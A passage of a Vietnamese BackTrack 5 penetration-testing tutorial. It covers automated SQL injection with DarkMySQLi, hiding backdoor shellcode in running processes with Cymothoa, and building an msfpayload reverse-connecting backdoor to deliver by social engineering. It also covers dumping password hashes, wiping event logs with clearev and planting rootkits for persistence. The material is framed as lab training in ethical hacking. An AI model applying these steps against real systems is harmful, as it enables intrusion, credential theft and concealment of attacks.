“Administrator”, nhưng một số ít, quyền “system” lại được thực thi .BackTrack 5 có các bộ công cụ
như meterpreter tạo điều kiện thuận lợi để leo thang đặc quyền .
5. Khai thác SQL Injection trong BackTrack 5 :
SQL Injection được xếp hạng số 1 trong OWASP Top 10 lổ hổng về bảo mật trong ứng dụng web
.Nó có thể được thực hiện khai thác bằng tay hoặc bằng các bộ công cụ khai thác tự động .Phương
pháp khai thác bằng tay thì cực kỳ nhàm chán và mất thời gian của anh em ta ( cái này đúng với các
đồng chí chơi UG nhé ), trong khi đó phương pháp khai thác tự động thì nhanh hơn, thân thiện với
người sử dụng và có nhiều hiệu quả hơn ( chuẩn không cần chỉnh ) .Havij là một trong những công
cụ khai thác SQL Injection tự động như nói trên .
Người biên dịch : cutynhangheo@gmail.com Trang 18
19. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Trong phần hướng dẫn này chúng ta chỉ đề cập đến bộ công cụ DarkMySqli dùng để SQL
Injection tự động vào website victim .
Cấu trúc câu lệnh như sau :
python DarkMySQLi.py –u http://target
Bộ công cụ này sẽ scan toàn bộ website victim, bằng cách sử dụng câu lệnh trên trong console
.Đường dẫn đầy đủ của bộ công cụ trên trong BackTrack 5 là /pentest/web/DarkMySQLi .
6. Sự thật bất ngờ đằng sau các công cụ mang tên khai thác tự động :
Hiện nay có rất nhiều nhà cung cấp bán các sản phẩm pentest tự động với lời mời chào như “Rẻ
hơn, Nhanh hơn và Chính xác hơn” .Với việc chi phí và thời gian bị hạn chế, tất nhiên các nhà
cung cấp này sẽ là lựa chọn hàng đầu .Nhưng chúng ta cần có cái nhìn tổng quan về các công cụ
pentest tự động như sau nó sẽ làm mọi người có cái nhìn sai về bảo mật, nó thu hẹp khoảng cách,
không cần bạn phải có kiến thức về IT và chính sách bảo mật .Mỗi người cần có đánh giá khách quan
về ưu và khuyết điểm của một trong hai phương pháp mà cutynhangheo đã giới thiệu ở trên, và cũng
cần dựa trên nhu cầu thực tế của cơ quan, tổ chức .
Trong phần hướng dẫn này, chúng ta đã được giới thiệu sơ qua về Web exploitation framework,
đánh cắp thông tin trình duyệt bằng các bộ công cụ của nhà cung cấp thứ 3, và tải chúng lên hệ
thống của victim .Trong phần hướng dẫn sắp tới cutynhangheo sẽ giới thiệu các khía cạnh khác của
lĩnh vực an toàn thông tin, forensics và reverse engineering .
Người biên dịch : cutynhangheo@gmail.com Trang 19
20. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Phần IV : Làm thế nào để ẩn mình
Trong phần hướng dẫn trước, chúng ta đã được giới thiệu sơ qua về các phương pháp thu thập thông
tin và đánh giá lổ hổng của hệ thống mục tiêu, phân tích hệ thống mạng, scan và truy cập vào mục tiêu,
và một số công cụ về leo thang đặc quyền .Trong phần này chúng ta sẽ xem xét qua vấn đề làm thế nào để
ẩn mình .
1. Tại sao phải ẩn mình ?
Mục đích của việc pentest là lặp lại các hành động của những attacker có sử dụng mã độc
.Không một attacker nào muốn mình bị phát hiện khi xâm nhập trái phép vào một hệ thống mạng, vì
vậy kỹ thuật ẩn mình luôn luôn được attacker sử dụng đến .Khi pentester thực hiện quá trình xâm
nhập cũng phải sử dụng kỹ thuật ẩn mình giống như vậy, để đánh giá hệ thống một cách trung thực
nhất .
Hình 18 : Bộ công cụ “Maintainning Access” trong BackTrack 5, chúng ta tập trung vào phần OS
Backdoors .
Trong phần này sẽ hướng dẫn anh em làm thế nào để sử dụng tính năng “Maintainning Access”,
trong đó sẽ có các tùy chọn như OS Backdoors, Tunneling và Web Backdoors như hình 18 .
2. OS backdoor Cymothoa :
Cymothoa là bộ công cụ dùng để ẩn backdoor trong BackTrack 5, có nghĩa là backdoor shell
code sẽ được chèn vào trong một tiến trình đang tồn tại .Bộ công cụ này được phát triển bởi
codewizard và crossbrowser của ElectronicSouls .
Các tùy chọn của bộ công cụ được sử dụng như sau :
Cymothoa –p <pid> -s <shellcode number> [options]
Người biên dịch : cutynhangheo@gmail.com Trang 20
21. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Cymothoa được cung cấp bao gồm các payloads có sẵn .Chúng được đánh số từ 0 14 .Bộ công
cụ này có rất nhiều tùy chọn bao gồm như tùy chọn chính, tùy chọn inject và các tùy chọn về
payloads .
Hình 19 : Trên đây là quá trình chạy Cymothoa với pid 1484 và lắng nghe ở port 100
Như hình 19 bên trên, thể hiện các hành động của Cymothoa, các kết quả với port 100 tại tiến
trình 1484 .
Hình 20 : Trước khi chạy Cymothoa .
Hình 21 : Sau khi chạy Cymothoa .
Khi chúng ta đã thực hiện quá trình chèn shell code vào, chúng ta có thể sử dụng lệnh netstat –l
để hiện thị các port 100 nào đang được lắng nghe, với hình 21 đây là kết quả sau khi chúng ta chèn
shell code numbered 0 vào tiến trình 1484 .Vì vậy chúng ta có thể thấy rằng, chúng ta có thể chạy
Cymothoa trên bất kỳ hệ thống nào và có thể lây nhiễm vào bất kỳ một cổng dịch vụ nào của hệ thống
đó và chúng ta có thể maintaining access vào hệ thống đó bất kỳ lúc nào .Victim sẽ không hề hay biết
sự tồn tại của backdoor, ngoại trừ victim phát hiện hay nghi ngở một điều bất thường nào đó trên hệ
thống của họ .
Để có được id của tiến trình trong BackTrack 5 chúng ta sử dụng câu lệnh ps –aux trong môi
trường Cymothoa shell .
Người biên dịch : cutynhangheo@gmail.com Trang 21
22. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
3. Meterpreter có phải là backdoor :
Trong phần trước chúng ta đã được giới thiệu sơ qua về meterpreter như là một phần không thể
thiếu của bộ công cụ Metasploit Framework, nó được dùng để thu thập thông tin và tạo 1 phiên làm
việc trong môi trường shell của hệ thống victim .Trong phần này chúng ta sẽ được giới thiệu sử dụng
meterpreter như một backdoor trong BackTrack 5 .
Câu lệnh sử dụng :
/opt/framework/msf3/msfpayload [<options>] <payload> [actions]
Đây là cách mà các attacker muốn quay trở lại hệ thống của victim nhiều lần, mà không cần
victim phải click hay thực thi một mã độc nào cả .Anh em cần phải hiểu thực sự về Metasploit và
Meterpreter, có thể tham khảo cuốn hướng dẫn sử dụng Metasploit ( sẽ được cung cấp trong thời
gian sớm nhất ) và các phần hướng dẫn trước về BackTrack 5 của cutynhangheo .
Hình 22 : Tạo một backdoor exe sử dụng msfpayload .
Trong hình 22 anh em có thể thấy được file exploit.exe, đây là mã độc của msf meterpreter
payload được tạo ra bằng câu lệnh msfpayload .Tiếp tục trong phần hướng dẫn này, chúng ta sẽ tạo
ra 1 backdoor luôn luôn lắng nghe ở cổng 4444 với phương pháp payloads, hệ thống của victim sẽ
luôn luôn kết nối về địa chỉ của attacker 192.168.13.132 trên cổng 4444 .
Hình 23 : Handler được tạo ra trong Metasploit để lắng nghe backdoor .
Sử dụng Metasploit, tạo ra một handler và thiết lập các tùy chọn LHOST và LPORT trong
msfpayload console .Sau khi đã thực hiện xong, chỉ cần chạy exploit .Exploit này có thể chạy trên bất
cứ một mục tiêu nào .Bất cứ khi nào victim click lên file này – anh em có thể gửi cho victim bằng
cách sử dụng kỹ thuật social engineering hay bất kỳ một phương pháp trá hình nào cũng được – nó sẽ
lắng nghe LHOST và kết nối ngược về attacker thông qua LPORT .Ngay lập tức khi victim thực thi
Người biên dịch : cutynhangheo@gmail.com Trang 22
23. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
file này trên hệ thống của họ, meterpreter shell sẽ khởi tạo ngay lập tức một kết nối tức thì .Lúc này
anh em cũng có thể hình dung ra attacker có thể làm điều gì rồi hen .
Hình 24 : Hệ thống victim bị truy cập bởi BT5 thông qua backdoor .
4. Lợi dụng lổ hổng để có backdoor :
Backdoor là một kênh kết nối bí mật vào hệ thống .Các attacker có thể truy cập không bị hạn chế
vào hệ thống victim bằng cách sử dụng các backdoor, phương pháp này sẽ tiết kiệm thời gian và các
nỗ lực của kỹ thuật tấn công ban đầu .Điều quan trọng ở pentester đó là cần phải thực nghiệm xâm
nhập hệ thống và tiến hành đánh giá xem hệ thống đó có dễ dàng bị chiếm quyền điều khiển bởi
backdoor hay không, để ngăn ngừa việc truy cập trái phép này pentester có thể sử dụng các bản vá
lỗi phù hợp cho hệ thống đó .
Các lỗ hổng phổ biến nhất hiện nay tạo điều kiện cho việc tấn công và chiếm quyền điều khiển
của backdoor đó là lỗi tràn bộ đệm, cross-site scripting ( XSS ) và quản trị từ xa .Phương pháp phòng
vệ phổ biến nhất bao gồm thường xuyên thay đổi chính sách bảo mật dựa trên các kịch bản có thể xảy
ra để giảm thiểu mối đe doa có thể gây thiệt hại cho cơ quan, tổ chức, thực hiện phương pháp kiểm
soát sự an toàn của phần mềm thường xuyên và phải đúng theo tiêu chuẩn bảo mật trong lập trình,
cần phải đảm bảo chắc chắn kiểm tra mức độ bảo mật về mặt ứng dụng và phải thực hiện sửa đổi các
vấn đề đó một cách thường xuyên .
Trong phần hướng dẫn này, chúng ta đã biết được làm thế nào để sử dụng kỹ thuật ẩn mình trong
các cuộc tấn công và xâm nhập .Trong phần hướng dẫn kế tiếp cũng là phần kết thúc trong series
hướng dẫn sử dụng BackTrack 5, cutynhangheo sẽ trình bày một cuộc tấn công dựa trên một kịch bản
giả định và sẽ sử dụng BackTrack 5 để thực hiện, cuộc tấn công giả định này sẽ sử dụng tất cả các
phương pháp và kỹ thuật đã được giới thiệu ở các phần trên .
Người biên dịch : cutynhangheo@gmail.com Trang 23
24. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Phần V : Chi tiết một cuộc tấn công giả định
Trong bốn phần trước của cuốn hướng dẫn sử dụng BackTrack 5, cutynhangheo đã giải thích chi tiết
từng giai đoạn của quá trình thực nghiệm xâm nhập .Phần cuối cùng này chúng ta sẽ cô đọng lại tất cả từ
trước cho đến bây giờ, và chúng ta sẽ có cái nhìn nhận khách quan về các khía cạnh khác nhau của đạo
đức hacking và thực nghiệm xâm nhập .
Đối với phần hướng dẫn này, chúng ta cần thiết lập một hệ thống lab như sau : 1 máy ảo chạy
Windows 7, 1 máy ảo chạy BackTrack 5 và 1 số máy ảo chạy các Windows khác .Chúng ta sẽ đi qua từng
bước của quá trình tấn công và cố gắng xâm nhập vào hệ thống mạng này nhé .
1. Bộ công cụ Autoscan Network trong BackTrack 5 :
Sau khi kết nối vào hệ thống mạng, bước đầu tiên chúng ta cần scan cấu trúc hệ thống mạng và
kiểm tra xem các hệ thống đang live trong hệ thống mạng đó .Để thực hiện việc này, chúng ta sử
dụng bộ công cụ Autoscan Network trong BackTrack 5 .Đường dẫn đến bộ công cụ như sau :
Application Backtrack Information gathering Network analys Network scanners
Autoscan .
Hình 25 : Autoscan Network 1.5 .
Như hình 25 thì Autoscan Network 1.5 là một bộ công cụ có tính năng scan cấu trúc hệ thống
mạng, nó sẽ liệt kê tất cả các địa chỉ IP đang được sử dụng, chi tiết về hostname, users và các hệ điều
hành đang hoạt động trên hệ thống mạng .
Như các phần hướng dẫn trên, anh em có thể sử dụng Nmap để làm việc này cũng được .Trước
khi thực hiện tấn công, chúng ta sẽ thực hiện bước phân tích lổ hổng trên mục tiêu cần tấn công .
Giả sử mục tiêu của chúng ta có địa chỉ IP là 192.168.13.129, đang sử dụng hệ điều hành
Windows 2000 server, chúng ta có thể sử dụng Nessus hay OpenVAS để kiểm tra lổ hổng của hệ điều
hành này .Tuy nhiên trong phần hướng dẫn này, cutynhangheo muốn anh em nên sử dụng phương
pháp kiểm tra lổ hổng bằng tay nhé .
2. Tài nguyên lổ hổng trực tuyến :
Người biên dịch : cutynhangheo@gmail.com Trang 24
25. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
Website cung cấp các thông tin về lổ hổng phổ biến nhất như National Vulnerability Database tại
địa chỉ http://web.nvd.nist.gov/view/vuln/search cung cấp các thông tin về các lổ hổng khác nhau
cho một hệ thống cụ thể .
Hình 26 : National Vulnerability Database Search .
3. Pentest mục tiêu :
Trong phần hướng dẫn này, cutynhangheo sẽ sử dụng lổ hổng trong Windows 2000 Server đó là
lổ hổng RPC DCOM port cho phép thực thi mã từ xa, dẫn đến việc làm tràn bộ đệm của hệ thống
.Trong phần hướng dẫn Metasploit, chúng ta đã biết cách làm thế nào để khai thác các lổ hổng trên
mục tiêu .Nó sẽ khởi tạo 1 meterpreter shell trên hệ thống Windows 2000 Server có IP là
192.168.13.129, như hình 27 bên dưới .BackTrack 5 còn cung cấp bộ công cụ như SET, có thể được
sử dụng để xâm nhập hệ thống .
Hình 27 : Bên trong hệ thống Windows 2000 Server .
Một khi chúng ta đã xâm nhập vào bên trong hệ thống được, thông tin chi tiết về hệ thống ta có
thể thu thập được .Sau đây là một số lệnh quan trong để thực hiện việc đó :
3.1. Hashdump : Đây là câu lệnh dùng để dump password hashes ( NT/LM ) của hệ thống mục
tiêu, thông tin này được dùng để crack password về sau để leo thang đặc quyền trên hệ thống
mục tiêu .
3.2. Sysinfo : Đây là câu lệnh dùng để thu thập thông tin chi tiết về hệ thống mục tiêu như là hệ
điều hành, nhà cung cấp, tên admin và nhiều thứ khác .
Người biên dịch : cutynhangheo@gmail.com Trang 25
26. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
3.3. Execute : Đây là câu lệnh cực kỳ mạnh, dùng để thực thi chương trình hay file trên hệ thống
mục tiêu .
3.4. Portfwd : Đây là câu lệnh rất mạnh, dùng để thực thi một dịch vụ trên một port chỉ định trên
hệ thống mục tiêu .Nó có thể sử dụng để tạo ra backdoor trong tương lai .
4. Xóa bỏ dấu vết :
Phần này sẽ cô đọng vấn đề xóa bỏ dấu vết của cuộc tấn công trên hệ thống mục tiêu .Một cách
đơn giản câu lệnh clearev dùng để xóa các event logs trong hệ thống, không để lại bất kỳ dấu vết nào
thề hiện sự truy cập trái phép .
Hình 28 : Clearev
Phần quản lý logs trên hệ thống mục tiêu .
Hình 29 : Event logs trong Windows 2000 Server .
Lệnh clearev sẽ xóa bỏ các logs và không để lại bất kỳ một dấu vết xâm nhập trái phép nào trên
hệ thống .Tuy nhiên, với một admin sắc sảo và có nhiều kinh nghiệm thì họ ngay lập tức sẽ nghi ngở
vì có cái gì đó bất ổn khi toàn bộ logs đều bị xóa sạch .Vì vậy, chúng ta nên cài bookdoor hoặc
rootkit để có thể quay lại victim bất kỳ lúc nào .
5. Tổng quan về mô hình bảo mật Windows :
Mô hình bảo mật của Windows khá đơn giản .Mỗi người dùng có 1 SID duy nhất .SID sẽ có dạng
như sau :
Người biên dịch : cutynhangheo@gmail.com Trang 26
27. Tài liệu hướng dẫn sử dụng BackTrack 5 – Tiếng Việt 2012
S-1-5-21-9867453210-2389765341-23768956-1023
Red - Revision level
Green – Identified Authority Value
Orange – Domain or local ID
Peach – Relative ID
Người biên dịch : cutynhangheo@gmail.com Trang 27